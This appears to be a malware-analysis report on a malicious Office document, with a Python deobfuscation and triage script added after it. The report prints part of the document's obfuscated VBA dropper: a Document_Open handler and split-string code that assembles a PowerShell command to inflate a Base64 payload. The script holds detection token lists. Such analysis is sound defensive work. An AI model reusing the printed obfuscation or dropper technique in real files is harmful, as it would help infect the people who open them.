Verdict: MALICIOUS (Risk Score 222)
Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing VBA macros. The Document_Open macro triggers a Shell() call that executes a PowerShell command. That command is built to download and execute a second-stage payload from a remote URL, which is dropper behaviour.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6605641-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6605641-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, and documents whose source extraction failed, where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard Office Open XML DrawingML namespace URI and appears in any document with drawing content; it is not a network indicator and should not be treated as a payload or C2 URL.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18838 bytes | 3e86b4701daade618c0120fa9639a2c2810e5a1863b8fb7afb623b3f9fbaa8c4 |
Preview: first 1,000 lines of the extracted script (the report truncates the listing partway through kiFAIwwZFUp())

```vba
Attribute VB_Name = "QdNinbYszdDwW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
cIBoT = (hKacLF * kUiZX - IXaHV - TNnHBN + 43548 - NKJqF + (40498 + rOUEuA))
DrvWsO = (CAjCAh * DZPprI - KrTCiQ - FDbla + 67803 - PFqiwS + (15351 + KDUzz))
hPhjS = (JOXcpf * OdWUAj - LGmvA - XcPuPu + 72252 - TMmZfm + (76379 + hojTRZ))
psJHq = (dmidbh * cMvtBv - juUtX - ZwLhXw + 72965 - EXliz + (85991 + ArBLGk))
sPRfMvYlw ("" + EIkDsAcUJwlzz + ZwJnTYKsp + kiFAIwwZFUp + oQaASzhG + fdLDz + ZQdZTuXPkOBia + dvkYpJPB)
iDTiQr = (XXIGU * uJAVt - rEapvi - zfliJ + 28950 - skrEjT + (44001 + HDtzIi))
pnVQL = (HOYAFs * lswrtU - SvpaO - zXwvZ + 54380 - Qwrnz + (30281 + ccjjO))
End Sub
Attribute VB_Name = "WKuHPOjwtwvBB"
Function kiFAIwwZFUp()
On Error Resume Next
dXksk = MUizc / NViBPB + JszrQi + SMqzq + KHpUi * uDjED
frdsiC = 25407 + aadfU * 20432 * rzdkIP - GjNWr - vaowu / 70237 * KoTLu * 56519 / jjLpK * 26022 / 23516 * 23396 * aSoQIk
IKGPzm = 64831 + jHXCjS * 80241 * NnZUYM - ujrNdF - uZroD / 69555 * ljudE * 51126 / oJCHd * 18242 / 4972 * 41489 * cHvjL
RvkOnfzwVV = "p" + EfPNzLrPFI + iqUlYGZ + "owe" + AwRYOPh + MFbWZYK + "rsh" + wLsXBaSjlnJIE + TEjwpjvKH + "el" + WbIRvbjPbdMcuq + duzvHzIDVoMC + "l " + BlVFErX + ibpipGbpHjASP + "( " + oWTFvHOd + cbHpmOKJDO + "NeW" + VSwuzFTGk + OQhYSYkUzhG + "-o" + TzUUqIMunWB + BHJKBnrA + "b" + EqslSuVkPF + zkzQcYjatjX + "jEc" + cKnjSViabP + WtzRllvqaIYLkL + "T " + SiYTjOqki + jnAYUWTFijIHub + "I" + UlcvHCLIwrJOID + hpMDakEoQFom + "o.c" + drQSVwFIpj + bdMFzaQZaFPPV + "oM" + niBOYwaORzqh + YAjaiJacLIN + "P"
vXcBwl = SdnSD + 86431 * OuIHt / uBFjon + GKTtAC / iqovt
LuNNW = IMhDBU + 43970 * tStMJK / HKtRB + WYFMNz / jHrVRz
YAzdPkHiY = "re" + PsjfZkYvjjl + kTwVLmn + "sSi" + nWYGmaYuMrPiu + WFlzKciLHfWY + "O" + ljGBYFJGTzzWoX + ZpSKwGAoROJ + "N.D" + aPCzzaKIc + bPloCnoGRfFhFO + "eF" + jSkJvwqshuX + kTzSWijUMldaCt + "LAT" + iwlzudpsNz + tGHQzJjMHP + "est"
PLUhHi = FFWzwm + 82239 * GdFEW / JbFdM + tMXOTN / kjJIk
XTWHJ = GGZjCK + 24035 * FjODvF / shIjkj + TzUUZ / hqEwU
wFvmzodwKU = "R" + noLJBifzuFpa + mOaYzAncOhk + "E" + OfQiNiMFszXjC + DPfzICDqX + "AM" + VzKadYElQUiW + uZtRDpvaUYwCl + "([S" + KpsniNNuSTwfQ + ZtEHOcKZTGnvim + "ySt" + mQvFfliwijf + FKiQVzFwiZNAQY + "EM" + SiIqsMOVDTnKH + zjbOvJiJmWcI + "." + FPNBGMwWkFsw + CMvqArQQ + "io." + lhnZWUPE + wEaIBRiazVWzz + "M" + ZbmHzQoa + YYZAPpoZV + "E" + mmpjIqRSnlhWSw + zXXKdXsdsJZ + "m" + iaiDInowXqa + PiqCHEVM + "OR" + zDUPuMq + hmFLDSJIF + "YST"
PwHjZz = 94174 / TTOmVS + (kKvtp / wBwuzH + 8293 / znaEi)
jznWH = 26851 / qCVOTr + (hzoYu / jrJoUJ + 36976 / jzvQjQ)
ROLjuN = 40918 / vhRQc + (GkXfK / wJlas + 85887 / Wjnin)
sRllkiCzR = "re" + wkMubdACNh + PqCDYXTsHcl + "a" + rwUIzdh + JALkjnwGXsARG + "m]" + kJQPmLTwXsk + uOEKdXhBrno + "[CO" + BFsnkkTqXpNRLf + nrzIQMJ + "N" + niwdsVckpKOGk + LqWZrsSsqzEvoX + "v" + vEwzBUMfTkhVV + CjzwaqkwwUqHdo + "E" + MJVSBnKwqdqFG + XODBMpaFwLIwdK + "RT" + ruzULzJuOYBF + iqnWTtZmNwmDXG + "]:"
hnitzK = 18320 / mXFJmn + (UIwjRK / rTJEh + 97821 / HbDBZq)
LFDOLtSq = ":" + AUjzkvo + ZJRvZZbfbvLjud + "Fr" + iwBINwas + MkNVvftFHoQMCd + "Om" + PSQUFqWpGzmHmc + qbMqSFAfpp + "ba" + rRuYiThIck + OXPwsmTfFr + "S" + QjbJRkiQVAw + NZSubwF + "e6"
Ozbuf = 68835 / tlGZaW + (FzIqNV / LIqVF + 74727 / ichsK)
buqDnD = 42433 / QAvTHz + (YqrGbA / ZariN + 1161 / duQrZH)
DJWhdFUD = "4S" + fjVibjGYnaNspR + tLCCpkZZwsPI + "tRi" + PRJLTbViujFj + ruQMtwwzCZFuHv + "NG" + RzzGKwjiwHOL + zFidiCbDP + "('" + POkFZTZBLSIk + vLmOljnijcAL + "V" + fHOhYYuh + YnoKFAoUns + "Z" + poiruhiIFNqMV + aLWqNMO + "Bd" + uddjnfYkZnSZDh + DqSKzboBz + "a8" + QCaiawjw + vUaoFni + "I" + XitdKWvfzSp + ZWIizJraWlMI + "wF" + sVsoFOSqiW + IfThdbcJv + "Ib/" + WnZvDAtjUCA + GijNTirl + "Si"
ALGpHk = 62054 / aopWBj + (PplqE / IcKaz + 85172 / qMLuM)
XSVsozrriEq = "8K" + wLlvoEZOTkdC + sGv
... (truncated)
```

What the visible part shows: every string in kiFAIwwZFUp() is assembled from short literals separated by undeclared variables, which are Empty and contribute nothing to the concatenation, while the arithmetic lines are decoys kept harmless by On Error Resume Next. Read in source order, the literals spell out `powershell ( NeW-objEcT Io.coMPresSiON.DeFLATestREAM([SyStEM.io.MEmORYSTream][CONvERT]::FrOmbaSe64StRiNG('VZBda8IwFIb/Si8K`, i.e. a PowerShell one-liner that inflates an inline Base64-encoded Deflate blob (the Base64 text continues past the truncation point). Neither the Shell() call flagged by OLE_VBA_SHELL nor the download logic described in the summary falls within this truncated preview.
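The following Python is an added example, not the analyzer's own code and not part of oletools, written to show how a practitioner would recover the command hidden by the split-string obfuscation in the preview above and re-derive the auto-exec-plus-execution finding from the heuristics list. The sample input is the Document_open handler and the string-building lines of kiFAIwwZFUp() copied from the preview (decoy lines included, cut off where the report truncates). The token lists and result keys are this example's own approximation of the report's checks, not the analyzer's implementation; the literal-harvesting shortcut is only valid because the interleaved variables are never assigned.

```python
"""Recover the PowerShell command from split-string VBA and flag auto-exec + execution tokens."""
import re

# Sample input copied from the report's macro preview (Document_open handler and the
# string-building lines of kiFAIwwZFUp). The function is cut off where the preview is.
MACRO_SOURCE = '''
Private Sub Document_open()
On Error Resume Next
cIBoT = (hKacLF * kUiZX - IXaHV - TNnHBN + 43548 - NKJqF + (40498 + rOUEuA))
sPRfMvYlw ("" + EIkDsAcUJwlzz + ZwJnTYKsp + kiFAIwwZFUp + oQaASzhG + fdLDz + ZQdZTuXPkOBia + dvkYpJPB)
End Sub
Function kiFAIwwZFUp()
On Error Resume Next
dXksk = MUizc / NViBPB + JszrQi + SMqzq + KHpUi * uDjED
RvkOnfzwVV = "p" + EfPNzLrPFI + iqUlYGZ + "owe" + AwRYOPh + MFbWZYK + "rsh" + wLsXBaSjlnJIE + TEjwpjvKH + "el" + WbIRvbjPbdMcuq + duzvHzIDVoMC + "l " + BlVFErX + ibpipGbpHjASP + "( " + oWTFvHOd + cbHpmOKJDO + "NeW" + VSwuzFTGk + OQhYSYkUzhG + "-o" + TzUUqIMunWB + BHJKBnrA + "b" + EqslSuVkPF + zkzQcYjatjX + "jEc" + cKnjSViabP + WtzRllvqaIYLkL + "T " + SiYTjOqki + jnAYUWTFijIHub + "I" + UlcvHCLIwrJOID + hpMDakEoQFom + "o.c" + drQSVwFIpj + bdMFzaQZaFPPV + "oM" + niBOYwaORzqh + YAjaiJacLIN + "P"
vXcBwl = SdnSD + 86431 * OuIHt / uBFjon + GKTtAC / iqovt
YAzdPkHiY = "re" + PsjfZkYvjjl + kTwVLmn + "sSi" + nWYGmaYuMrPiu + WFlzKciLHfWY + "O" + ljGBYFJGTzzWoX + ZpSKwGAoROJ + "N.D" + aPCzzaKIc + bPloCnoGRfFhFO + "eF" + jSkJvwqshuX + kTzSWijUMldaCt + "LAT" + iwlzudpsNz + tGHQzJjMHP + "est"
wFvmzodwKU = "R" + noLJBifzuFpa + mOaYzAncOhk + "E" + OfQiNiMFszXjC + DPfzICDqX + "AM" + VzKadYElQUiW + uZtRDpvaUYwCl + "([S" + KpsniNNuSTwfQ + ZtEHOcKZTGnvim + "ySt" + mQvFfliwijf + FKiQVzFwiZNAQY + "EM" + SiIqsMOVDTnKH + zjbOvJiJmWcI + "." + FPNBGMwWkFsw + CMvqArQQ + "io." + lhnZWUPE + wEaIBRiazVWzz + "M" + ZbmHzQoa + YYZAPpoZV + "E" + mmpjIqRSnlhWSw + zXXKdXsdsJZ + "m" + iaiDInowXqa + PiqCHEVM + "OR" + zDUPuMq + hmFLDSJIF + "YST"
sRllkiCzR = "re" + wkMubdACNh + PqCDYXTsHcl + "a" + rwUIzdh + JALkjnwGXsARG + "m]" + kJQPmLTwXsk + uOEKdXhBrno + "[CO" + BFsnkkTqXpNRLf + nrzIQMJ + "N" + niwdsVckpKOGk + LqWZrsSsqzEvoX + "v" + vEwzBUMfTkhVV + CjzwaqkwwUqHdo + "E" + MJVSBnKwqdqFG + XODBMpaFwLIwdK + "RT" + ruzULzJuOYBF + iqnWTtZmNwmDXG + "]:"
LFDOLtSq = ":" + AUjzkvo + ZJRvZZbfbvLjud + "Fr" + iwBINwas + MkNVvftFHoQMCd + "Om" + PSQUFqWpGzmHmc + qbMqSFAfpp + "ba" + rRuYiThIck + OXPwsmTfFr + "S" + QjbJRkiQVAw + NZSubwF + "e6"
DJWhdFUD = "4S" + fjVibjGYnaNspR + tLCCpkZZwsPI + "tRi" + PRJLTbViujFj + ruQMtwwzCZFuHv + "NG" + RzzGKwjiwHOL + zFidiCbDP + "('" + POkFZTZBLSIk + vLmOljnijcAL + "V" + fHOhYYuh + YnoKFAoUns + "Z" + poiruhiIFNqMV + aLWqNMO + "Bd" + uddjnfYkZnSZDh + DqSKzboBz + "a8" + QCaiawjw + vUaoFni + "I" + XitdKWvfzSp + ZWIizJraWlMI + "wF" + sVsoFOSqiW + IfThdbcJv + "Ib/" + WnZvDAtjUCA + GijNTirl + "Si"
XSVsozrriEq = "8K" + wLlvoEZOTkdC + sGv
'''

# A VBA string literal; a doubled quote inside it is an escaped quote.
STRING_LITERAL = re.compile(r'"((?:[^"]|"")*)"')
PROC_START = re.compile(r'^\s*(?:(?:Private|Public)\s+)?(?:Sub|Function)\s+(\w+)\s*\(', re.I)
PROC_END = re.compile(r'^\s*End\s+(?:Sub|Function)\b', re.I)

# Assumed token lists, modelled on the report's heuristics (OLE_VBA_DOCOPEN,
# OLE_VBA_PCODE_AUTOEXEC_EXEC); the analyzer's real lists are not published here.
AUTO_EXEC_TOKENS = ("Document_Open", "AutoOpen", "Auto_Open", "Workbook_Open",
                    "AutoExec", "Document_Close", "AutoClose")
EXEC_TOKENS = ("powershell", "cmd.exe", "wscript.shell", "createobject", "shellexecute",
               "downloadfile", "downloadstring", "xmlhttp", "frombase64string", "deflatestream")
# Shell( as a call, not the "shell" inside "powershell (".
SHELL_CALL = re.compile(r'(?<![a-z0-9_])shell\s*\(')


def procedures(source):
    """Map each Sub/Function name to its body lines. A procedure with no
    End Sub/End Function (cut off by the report's truncation) is still returned."""
    procs, current, body = {}, None, []
    for line in source.splitlines():
        start = PROC_START.match(line)
        if start:
            current, body = start.group(1), []
        elif PROC_END.match(line) and current is not None:
            procs[current], current = body, None
        elif current is not None:
            body.append(line)
    if current is not None:
        procs[current] = body
    return procs


def literals(line):
    """String literals on one line, in order, with "" unescaped to a single quote."""
    return [s.replace('""', '"') for s in STRING_LITERAL.findall(line)]


def rebuild(body):
    """Concatenate every literal in source order. Correct for this sample because
    the variables between the literals are never assigned, so they are Empty and
    "p" + Empty + "owe" evaluates to "powe". A macro that assigned them would
    need real expression evaluation instead of this shortcut."""
    return "".join(lit for line in body for lit in literals(line))


def triage(source):
    """Auto-exec handlers, execution tokens (also searched in the rebuilt strings),
    whether a literal Shell( call is visible, and the combined auto-exec+exec flag."""
    rebuilt = {name: rebuild(body) for name, body in procedures(source).items()}
    visible = source.lower()
    decoded = "\n".join(rebuilt.values()).lower()
    auto = [t for t in AUTO_EXEC_TOKENS if t.lower() in visible]
    execs = [t for t in EXEC_TOKENS if t in visible or t in decoded]
    shell_call = SHELL_CALL.search(visible) is not None
    return {
        "rebuilt": rebuilt,
        "auto_exec": auto,
        "exec_tokens": execs,
        "shell_call": shell_call,
        "autoexec_with_exec": bool(auto) and (bool(execs) or shell_call),
    }


if __name__ == "__main__":
    result = triage(MACRO_SOURCE)
    for name, text in result["rebuilt"].items():
        print(f"{name}: {text!r}")
    print({k: v for k, v in result.items() if k != "rebuilt"})
```

On this input the rebuilt kiFAIwwZFUp() string is the PowerShell prefix that decompresses an inline Base64/Deflate blob, the execution tokens come only from the rebuilt text (none of them exist as contiguous substrings in the visible source, which is the point of the obfuscation), and no Shell( call is found because the preview stops before it. Once the full macros.bas is available, run triage() on the whole file; the Base64 string it recovers can then be decoded and inflated with zlib to reach the second-stage script.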